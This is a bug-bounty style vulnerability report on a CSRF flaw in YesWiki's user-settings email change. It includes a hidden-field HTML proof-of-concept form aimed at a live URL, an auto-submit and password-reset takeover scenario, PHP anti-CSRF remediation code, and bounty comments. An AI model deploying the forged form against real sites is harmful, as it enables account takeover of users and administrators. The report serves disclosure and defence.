Cross-Site Request Forgery (CSRF) in yeswiki/yeswiki
Reported on
Dec 6th 2021
Description
Hey all,
So I found that YesWiki doesn't implement any sort of anti-CSRF mechanism; I found that the change-email function is vulnerable to CSRF attacks, which leads to account takeover.
Proof of Concept
<!-- Attacker-hosted page. The victim's browser attaches its YesWiki session
     cookie to this cross-site POST, so the request is processed as the victim. -->
<html>
<body>
<form method="POST" action="https://yeswiki.net/cercopitheque/demo/?ParametresUtilisateur">
<input type="hidden" name="usersettings_action" value="update"/>
<input type="hidden" name="email" value="testerhacker@gmail.com"/>
<input type="hidden" name="revisioncount" value="20"/>
<input type="submit" value="Submit">
</form>
</body>
</html>
Exploitation Scenario:
An attacker sends the above PoC page to a logged-in victim.
Rather than relying on the victim clicking Submit, the page can auto-submit the form (for example with document.forms[0].submit() in a script or an onload handler). Because the browser attaches the victim's session cookie to the cross-site POST, the victim's email is changed silently and the victim can then be redirected to a third-party site.
The attacker then requests a password reset, which is delivered to the attacker-controlled email address, and takes over the account.
NOTE: the attack applies equally to an administrator account, which would let the attacker compromise the confidentiality, integrity and availability of other users' data.
Remediation Actions:
Implementing an anti-CSRF token (and/or a custom anti-CSRF request header) that is validated server-side on every state-changing request should be sufficient to resolve the root cause of the issue. Requiring the current password, or sending a confirmation link to the new address, before an email change takes effect would additionally block the account-takeover path.
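As an added illustration of the remediation above (example code written for this report, not YesWiki's own code), the following shows a synchronizer-token check in PHP, the language YesWiki is written in: a per-session token from a CSPRNG, embedded in the form and compared in constant time on submit, with an Origin/Referer check as defense in depth. The function names csrf_token and csrf_check, the field name csrf_token, and the expected origin value are assumptions for illustration; only usersettings_action and email mirror the PoC's field names.

```php
<?php
// Added example, not YesWiki's code. Names (csrf_token, csrf_check, the
// csrf_token field, the expected origin) are illustrative assumptions.

session_start();

function csrf_token(): string {
    // One token per session, generated from a CSPRNG. Regenerate it on login
    // together with the session id so a pre-login token cannot be reused.
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

function csrf_check(array $post, array $server, string $expectedOrigin): bool {
    // 1. The token in the POST body must match the session copy. hash_equals()
    //    compares in constant time so the check does not leak the token.
    $sent   = $post['csrf_token'] ?? '';
    $stored = $_SESSION['csrf_token'] ?? '';
    if ($stored === '' || !is_string($sent) || !hash_equals($stored, $sent)) {
        return false;
    }

    // 2. Defense in depth: the request must come from our own origin. Browsers
    //    send Origin on cross-site POSTs; fall back to Referer if it is absent.
    //    A request with neither header is rejected (origin stays null).
    $origin = $server['HTTP_ORIGIN'] ?? null;
    if ($origin === null && isset($server['HTTP_REFERER'])) {
        $p = parse_url($server['HTTP_REFERER']);
        if ($p !== false && isset($p['scheme'], $p['host'])) {
            $origin = $p['scheme'] . '://' . $p['host']
                    . (isset($p['port']) ? ':' . $p['port'] : '');
        }
    }
    return $origin === $expectedOrigin;
}

if ($_SERVER['REQUEST_METHOD'] === 'POST'
    && ($_POST['usersettings_action'] ?? '') === 'update') {
    // Expected origin is an assumption taken from the PoC's target host.
    if (!csrf_check($_POST, $_SERVER, 'https://yeswiki.net')) {
        http_response_code(403);
        exit('Request rejected: missing or invalid CSRF token / origin');
    }
    // At this point the request is same-origin and carries a valid token.
    // Still validate the new address and require the current password (or a
    // confirmation link sent to the new address) before persisting the change.
}
?>
<form method="POST" action="?ParametresUtilisateur">
  <input type="hidden" name="usersettings_action" value="update">
  <!-- The attacker's cross-origin page cannot read this value, so the forged
       form in the PoC above cannot include a matching token. -->
  <input type="hidden" name="csrf_token"
         value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') ?>">
  <input type="email" name="email" value="">
  <input type="submit" value="Save">
</form>
```

With this in place the PoC form still reaches the server, but it fails the token comparison (the attacker cannot obtain the victim's session token) and, on a modern browser, also fails the Origin check, so the email is not changed. The token is only meaningful if it is tied to the session and never exposed to cross-origin readers (no CORS wildcard on the page that renders it).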
Impact
Taking over user accounts.
Best Regards,
Moad
Occurrences
Hey @maintainer, we can work on a fix if you want; please ping me using @researcher.
Thanks,
Moad
Hey @admin, I think that a CSRF that leads to account takeover deserves more than $5?
Hello @mdakh404, I would recommend creating an issue on our public roadmap where you can share your thoughts!
Hello @j9rem, can you please deploy a fix for this one ?